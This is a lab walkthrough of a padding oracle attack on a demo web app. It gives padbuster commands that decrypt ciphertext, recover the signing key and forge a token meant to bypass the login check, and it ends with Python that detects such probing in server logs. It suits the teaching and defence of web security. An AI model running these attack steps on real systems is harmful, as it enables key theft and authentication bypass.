Padding Oracle

In this lab, you will learn to perform a padding oracle attack on a vulnerable application to steal the signing key and also create a valid attacker-controlled encrypted message.

There is a web app that can perform various functions such as encrypting and decrypting strings.

The application can be attacked using the padbuster tool from https://github.com/AonCyberLabs/PadBuster.

# padbuster command
padbuster "http://demo.ine.local/echo?cipher=6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34e80" "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34e80" 16 -encoding 1

# encoding 1 is for lowercase hex

Because the IV is not known, the first block of the text is missing. Running padbuster with the command below will brute-force the IV.

# what we know
6b664ef0359fe233e021ad36b12d8e32 -> ApplicationUsern
b8f1335522753d45174435c16b52dc2e -> ame=user&Passwor
5bbd4363b9d91d4c9100beae6ce34e80 -> d=sesame

padbuster "http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32" "6b664ef0359fe233e021ad36b12d8e32" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e" -noiv

# just need the first block
We use just the first block of the whole encrypted string, the one that was not decrypted.
Next, we specify 16 bytes as the block size and lowercase hex encoding.
-error tells padbuster which string to look for in the response page and treat as the error. (We could have identified that error message by requesting something like http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34eff; the response would indicate the invalid padding.)
-noiv is used to get the intermediate value after decrypting the first block.

To get the signing key, we need to XOR the hex value obtained for the first ciphertext block with the text "ApplicationUsern".

Converting the result to ASCII reveals the key.

Using padbuster, it is also possible to create a valid message that we control.

padbuster "http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32" "6b664ef0359fe233e021ad36b12d8e32" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e" -plaintext "=xyz&ApplicationUsername=authorization&Password=bypass"

This gives us a new encrypted value.

When the application parses this value, the username and password check could be bypassed.
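
From the defender's side, the padbuster runs above should show up in the web server log as many /check requests that keep the same final block and vary the block in front of it. The Python below is an added example, not part of the original lab, that flags that pattern. The access-log format, client addresses, threshold, function names and the assumed request shape are assumptions, and the sample log is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

BLOCK_HEX = 32  # 16-byte blocks in lowercase hex, as in the lab
# Assumed log format: common-log-style line with the request in quotes.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "GET (\S+) HTTP/[\d.]+" (\d{3})')
HEX_RE = re.compile(r"[0-9a-f]+")

def find_oracle_probing(lines, threshold=20):
    """Return {(client, final_block): n} for clients that sent at least
    `threshold` distinct blocks in front of the same final block."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != "/check":
            continue
        cipher = parse_qs(url.query).get("cipher", [""])[0].lower()
        # Need well-formed hex made of at least two whole blocks.
        if len(cipher) < 2 * BLOCK_HEX or len(cipher) % BLOCK_HEX:
            continue
        if not HEX_RE.fullmatch(cipher):
            continue
        final_block = cipher[-BLOCK_HEX:]
        varied_block = cipher[-2 * BLOCK_HEX:-BLOCK_HEX]
        seen[(client, final_block)].add(varied_block)
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}

# --- constructed sample log (ciphertext values taken from the lab text) ---
TARGET = "6b664ef0359fe233e021ad36b12d8e32"
PREFIX = "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e"
FULL = PREFIX + "5bbd4363b9d91d4c9100beae6ce34e80"

def make_line(client, cipher, status=200):
    return (f'{client} - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /check?cipher={cipher} HTTP/1.1" {status}')

# A normal client repeating one valid token, and a client cycling the
# block in front of a fixed final block.
SAMPLE_LOG = [make_line("198.51.100.7", FULL)] * 3
SAMPLE_LOG += [make_line("203.0.113.9", PREFIX + f"{i:02x}".rjust(BLOCK_HEX, "0") + TARGET)
               for i in range(64)]

if __name__ == "__main__":
    print(find_oracle_probing(SAMPLE_LOG))
```

The threshold needs tuning against real traffic; a legitimate client normally presents a handful of distinct tokens, not dozens that share one final block.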
